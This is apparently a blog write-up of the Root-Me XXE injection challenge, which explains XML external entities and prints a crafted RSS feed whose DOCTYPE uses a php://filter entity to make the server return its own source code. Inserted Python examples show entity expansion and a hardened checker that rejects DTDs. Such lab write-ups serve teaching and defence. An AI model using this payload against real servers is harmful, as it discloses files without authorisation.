Tuesday, 4 February 2020

[WRITEUP] XML EXTERNAL ENTITY (XXE) INJECTION ROOTME

AFTER THE TET HOLIDAYS, WE FACE THE CORONA (2019-nCoV) VIRUS, SO WE MUST PROTECT OURSELVES AND LIMIT GOING TO PUBLIC PLACES. AS AN OPTIMIST, IT'S MY RELAXING TIME TO CONTINUE SOLVING ROOT-ME CHALLENGES 😃. TODAY, WE HAVE XXE INJECTION. LET'S START!





FIRST OF ALL, WHAT IS XML? PLEASE READ IT SLOWLY.


https://www.w3schools.com/xml/xml_whatis.asp
OR WATCH THIS VIDEO ON YOUTUBE FOR FURTHER INFORMATION ABOUT XML AND XXE INJECTION.


https://www.youtube.com/watch?v=DREgLWZqMWg
ALRIGHT! NOW WE HAVE BASIC KNOWLEDGE ABOUT XML. IN XML, WE HAVE TWO TYPES OF DTD: INTERNAL AND EXTERNAL.


DTD STANDS FOR DOCUMENT TYPE DEFINITION, WHICH DEFINES THE STRUCTURE AND THE LEGAL ELEMENTS AND ATTRIBUTES OF AN XML DOCUMENT. WITH A DTD, GROUPS OF PEOPLE CAN AGREE ON A STANDARD DTD OR DATA STRUCTURE FOR INTERCHANGING DATA.
WITH XXE INJECTION, WE MUST FOCUS ON EXTERNAL ENTITIES, WHICH HAVE THE SYNTAX BELOW:


<!ENTITY entity-name SYSTEM "URL/URI">
AND IN THE XML BODY WE REFERENCE THE ENTITY BY NAME; A PARSER THAT RESOLVES EXTERNAL ENTITIES REPLACES THE REFERENCE WITH WHATEVER IT FETCHES FROM THAT URL/URI:
<article>&entity-name;</article> 

EXAMPLE (THE ENTITY IS DECLARED IN THE INTERNAL SUBSET OF THE DOCTYPE, THEN REFERENCED IN THE BODY):


<!DOCTYPE author [
<!ENTITY writer SYSTEM "https://www.article.com/entity.dtd">
]>
<author>&writer;</author>
THE OUTPUT IS THE CONTENT THAT THE PARSER FETCHES FROM https://www.article.com/entity.dtd
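To make the expansion step concrete, here is an added Python example (not code from the original post or from Root-Me). It parses two constructed documents with the standard-library xml.etree parser: one declares an internal entity, which every XML parser expands inline, and one declares a SYSTEM entity pointing at a local file. Python's ElementTree does not resolve external entities, so the second document is refused instead of the file being read; a parser that does honour SYSTEM entities (for example libxml2 with entity substitution enabled, as used by PHP) would instead return the file content, which is exactly the behaviour XXE abuses. The entity names, values and file path are assumptions for the demonstration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: an internal entity carries its value inline in the DTD.
# Any XML parser expands &writer; to that value.
INTERNAL_ENTITY_DOC = """<?xml version="1.0"?>
<!DOCTYPE author [
  <!ENTITY writer "Alice Example">
]>
<author>&writer;</author>"""

# Constructed sample: an external (SYSTEM) entity. Its value is whatever the
# parser fetches from the URI. A parser that resolves it would read this file
# and substitute its content for &writer;.
EXTERNAL_ENTITY_DOC = """<?xml version="1.0"?>
<!DOCTYPE author [
  <!ENTITY writer SYSTEM "file:///etc/hostname">
]>
<author>&writer;</author>"""


def expand(doc: str) -> str:
    """Parse the document and return the text of the root element.

    ElementTree never fetches SYSTEM entities, so a reference to one is
    reported as an undefined entity; that error text is returned so the
    caller can see why the document was refused.
    """
    try:
        root = ET.fromstring(doc)
        return root.text or ""
    except ET.ParseError as err:
        return f"refused: {err}"


if __name__ == "__main__":
    print(expand(INTERNAL_ENTITY_DOC))   # the inline value is substituted
    print(expand(EXTERNAL_ENTITY_DOC))   # refused: undefined entity &writer; ...
```

The difference between the two runs is the whole story of XXE: the markup is identical apart from the keyword SYSTEM, and only the parser's policy on external entities decides whether a file or URL ends up inside the parsed document.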

AND LET'S LOOK THROUGH THE XXE CHALLENGE OF ROOTME



THE QUESTION IS: "WHAT IS RSS?"


RSS is short for Really Simple Syndication and it’s a way to have information delivered to you, instead of you having to go find it.
AND RSS BELONGS TO THE XML FAMILY. SO CLEARLY, WE MUST SUBMIT A LINK TO AN RSS FEED TO PASS THIS CHECKER ENGINE. AFTER SEARCHING, I HAD A SIMPLE XML RSS SOURCE FROM W3SCHOOLS:

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">

<channel>
  <title>W3Schools Home Page</title>
  <link>https://www.w3schools.com</link>
  <description>Free web building tutorials</description>
  <item>
    <title>RSS Tutorial</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
  </item>
  <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
  </item>
</channel>

</rss> 
BECAUSE THE INPUT ONLY ACCEPTS A LINK, WE HAVE TO FIND SOMEWHERE TO HOST THIS CODE, AND I CHOSE PASTEBIN.
https://pastebin.com/raw/9T5CE8Tj
AFTER SUBMITTING THIS LINK, THE CHECKER ENGINE ACCEPTED THE FEED.





FIRST STEP DONE! BUT THE GOAL IS TO RETRIEVE THE PASSWORD. WE MUST READ THE FILE /etc/passwd OR THE SOURCE CODE OF THIS CHALLENGE. LET'S USE OUR KNOWLEDGE ABOUT XML AND DTD.

AFTER 3 HOURS OF SEARCHING AND TESTING, I COMPLETED THE PAYLOAD:


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> 
]>
<rss version="2.0">

<channel>
  <title>W3Schools Home Page</title>
  <link>https://www.w3schools.com</link>
  <description>Free web building tutorials</description>
  <item>
    <title>&xxe;</title>
    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
    <description>New RSS tutorial on W3Schools</description>
  </item>
  <item>
    <title>XML Tutorial</title>
    <link>https://www.w3schools.com/xml</link>
    <description>New XML tutorial on W3Schools</description>
  </item>
</channel>

</rss>

THE BLUE ROWS (THE DOCTYPE BLOCK AND THE &xxe; REFERENCE) ARE WHAT I INJECTED INTO THE CODE, FORCING THE SERVER TO RESPOND WITH ITS OWN SOURCE CODE!


php://filter/read=convert.base64-encode/resource=index.php READS THE SOURCE CODE THROUGH THE PHP FILTER WRAPPER (BASE64-ENCODED, SO THE PHP TAGS DO NOT BREAK THE XML).
<title>&xxe;</title> PRINTS THE CONTENT OF THE FILE TO THE SCREEN; THE REFERENCE IS PLACED INSIDE AN ITEM TAG BECAUSE THAT IS WHAT THE CHECKER DISPLAYS.
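From the defender's side, the checker engine fails because it parses a feed fetched from an arbitrary URL with a parser that honours DTDs. The following added Python example (not the challenge's PHP code, which is not shown on the page) models a hardened version of such an RSS checker: before the feed is parsed, it runs a declaration-only pass with expat and rejects any document that carries a DOCTYPE or an entity declaration, then extracts the item titles from clean feeds with xml.etree. The two feeds are constructed inline; the injected one reuses the entity declaration from the payload above so the gate can be seen catching it. Function and variable names are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed sample: the kind of clean RSS feed the checker expects.
CLEAN_FEED = b"""<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
  <title>Example feed</title>
  <item><title>RSS Tutorial</title></item>
  <item><title>XML Tutorial</title></item>
</channel>
</rss>"""

# Constructed sample: the same feed with a DOCTYPE and an external entity
# declaration of the kind used in the writeup's payload.
INJECTED_FEED = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
]>
<rss version="2.0">
<channel>
  <title>Example feed</title>
  <item><title>&xxe;</title></item>
</channel>
</rss>"""


class DtdFound(Exception):
    """Raised when a feed carries any DOCTYPE or entity declaration."""


def reject_dtd(data: bytes) -> None:
    """Declaration-only pass: record DOCTYPE and ENTITY declarations.

    No entity is ever resolved here: expat gets no ExternalEntityRefHandler,
    so it only reports what the DTD declares. Well-formedness is checked by
    the later parse, which is why ExpatError is ignored in this pass.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE {name}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        findings.append(f"ENTITY {name} -> {sysid or value!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass
    if findings:
        raise DtdFound("; ".join(findings))


def check_feed(data: bytes) -> dict:
    """Hardened checker: refuse DTDs, then parse and return the item titles."""
    try:
        reject_dtd(data)
    except DtdFound as why:
        return {"ok": False, "reason": f"DTD not allowed: {why}"}
    try:
        root = ET.fromstring(data)
    except ET.ParseError as err:
        return {"ok": False, "reason": f"not well-formed: {err}"}
    if root.tag != "rss":
        return {"ok": False, "reason": f"root element is <{root.tag}>, expected <rss>"}
    titles = [t.text or "" for t in root.iterfind("./channel/item/title")]
    return {"ok": True, "titles": titles}


if __name__ == "__main__":
    print(check_feed(CLEAN_FEED))      # accepted, two titles
    print(check_feed(INJECTED_FEED))   # rejected: DOCTYPE rss; ENTITY xxe -> ...
```

Rejecting the DTD outright is the usual mitigation because an RSS feed has no legitimate need for one. On the PHP side the same policy means not passing LIBXML_NOENT to simplexml_load_string() or DOMDocument::loadXML(), and on PHP versions before 8.0 calling libxml_disable_entity_loader(true) as well; the log line to alert on is any fetched feed that contains a DOCTYPE.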

AFTER N (N>40) TRIES, I WAS REFUSED BECAUSE OF THE SERVER'S FILTER. SO I DECIDED TO ENCODE IT WITH BASE64 IN THE PHP WRAPPER QUERY. FORTUNATELY, THE OUTPUT WAS EXACTLY WHAT I EXPECTED.




THE BASE64 OUTPUT WAS:




DECODE IT, AND I HAD THE FLAG FOR 35 POINTS! 😀

HAPPY HACKING!